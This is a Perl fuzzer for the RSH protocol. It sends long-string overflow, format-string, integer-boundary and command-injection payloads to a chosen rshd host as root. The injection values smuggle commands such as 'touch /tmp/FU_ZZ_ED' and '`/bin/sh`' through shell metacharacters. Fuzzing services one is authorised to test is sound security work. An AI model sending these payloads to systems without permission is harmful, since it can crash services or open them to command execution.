RSH Fuzzer


#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# RSHatter - RSH Protocol Fuzzer
# ~Just for fun~
 
use Net::Rsh;
use Getopt::Std;
 
# FUZZ DATA BEGIN HERE
# Four payload lists; the loops further down send every entry, one at a time,
# in each of the three string fields passed to Net::Rsh::rsh().
# All literals are single-quoted, so Perl performs no escape processing beyond
# \\ and \' -- the strings go out exactly as the characters typed here.

# Length tests: runs of 'A' from 2,200 up to 12,000,000 characters, followed by
# three repeated short sequences. '\\\AAAA' is two backslashes plus "AAAA".
# NOTE(review): '\0x99' is the five literal characters \ 0 x 9 9, not a single
# 0x99 byte -- confirm that is what was intended.
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);
 
# printf-style conversion specifiers, including very large field widths and
# precisions. The last two entries are again literal text ('\0xCD', '\0xCB'),
# not raw bytes, for the same single-quote reason as above.
@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);
 
# Numeric edge cases written as strings: values at and around the 16-bit and
# 32-bit signed/unsigned limits, two floating-point extremes, and hex forms of
# the same boundaries.
@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');
 
# Shell-metacharacter tests: "test" wrapped around a command with |, backticks,
# quotes, ; and &&. The Unix variants run `touch /tmp/FU_ZZ_ED`, so that file
# appearing on the host under test presumably means a field reached a shell
# unescaped; the script itself never checks for the file.
@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE
 
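# Parse the command line. -t <target> names the rshd host to test and is the
# only option this script understands; getopts() returns false when it meets
# anything else.
my $args_ok = getopts('t:', \%opts);
$target = $opts{'t'};

# The banner is printed on every run, ahead of either the usage text or the
# first test case.
print "\n RSHatter - RSH Protocol Fuzzer";
print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";

# Refuse to start unless the arguments parsed cleanly and -t carries a
# non-empty value; otherwise every request below would be issued with an
# undefined or empty host.
if (!$args_ok || !defined($target) || $target eq '')
{
     print "\n Usage: $0 -t <target>\n\n";
     exit(1);    # non-zero, so a wrapper can tell a refused run from a finished one
}

print "\nFuzzing RSHd @ $target... GOOD LUCK!\n";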
 
print "\n";
# Pass 1 of 3: each payload is sent as the second argument of rsh() (logged as
# "localuser"); the remote user and the command stay fixed at 'root' and 'id'.
# Lists are walked in the order overflows, fmtstring, numbers, miscbugs.
# Overflow payloads are logged as the word "overflow" rather than echoed; every
# other payload is printed verbatim.
# NOTE(review): the value returned by rsh() is discarded, so this script keeps
# no record of how the server answered any individual case.
foreach my $group ([ \@overflows, 1 ], [ \@fmtstring, 0 ], [ \@numbers, 0 ], [ \@miscbugs, 0 ]) {
    my ($list, $is_overflow) = @{$group};
    foreach my $entry (@{$list}) {
        my $payload = $entry;    # copy, so the shared list element is never aliased into rsh()
        my $shown   = $is_overflow ? 'overflow' : $payload;
        print "[Target = $target] [Fuzz = localuser/$shown]\n";
        my $client = Net::Rsh->new();    # a fresh client object per request, as before
        $client->rsh($target, $payload, 'root', 'id');
    }
}
 
print "\n";
# Pass 2 of 3: each payload is sent as the third argument of rsh() (logged as
# "remoteuser"); the local user and the command stay fixed at 'root' and 'id'.
# Same list order and logging rule as the other passes: overflow payloads are
# shown as the word "overflow", everything else is printed verbatim.
# NOTE(review): the value returned by rsh() is discarded here as well.
foreach my $group ([ \@overflows, 1 ], [ \@fmtstring, 0 ], [ \@numbers, 0 ], [ \@miscbugs, 0 ]) {
    my ($list, $is_overflow) = @{$group};
    foreach my $entry (@{$list}) {
        my $payload = $entry;    # copy, so the shared list element is never aliased into rsh()
        my $shown   = $is_overflow ? 'overflow' : $payload;
        print "[Target = $target] [Fuzz = remoteuser/$shown]\n";
        my $client = Net::Rsh->new();    # a fresh client object per request, as before
        $client->rsh($target, 'root', $payload, 'id');
    }
}
 
print "\n";
# Pass 3 of 3: each payload is sent as the fourth argument of rsh() (logged as
# "cmd"); both user names stay fixed at 'root'.
# Same list order and logging rule as the other passes: overflow payloads are
# shown as the word "overflow", everything else is printed verbatim.
# NOTE(review): the value returned by rsh() is discarded here as well.
foreach my $group ([ \@overflows, 1 ], [ \@fmtstring, 0 ], [ \@numbers, 0 ], [ \@miscbugs, 0 ]) {
    my ($list, $is_overflow) = @{$group};
    foreach my $entry (@{$list}) {
        my $payload = $entry;    # copy, so the shared list element is never aliased into rsh()
        my $shown   = $is_overflow ? 'overflow' : $payload;
        print "[Target = $target] [Fuzz = cmd/$shown]\n";
        my $client = Net::Rsh->new();    # a fresh client object per request, as before
        $client->rsh($target, 'root', 'root', $payload);
    }
}

# All three passes have been issued; the script ends with the default exit status.
print "\nFuzzing Complete. RSHaattteeeerrrrr!\n\n";

exit;
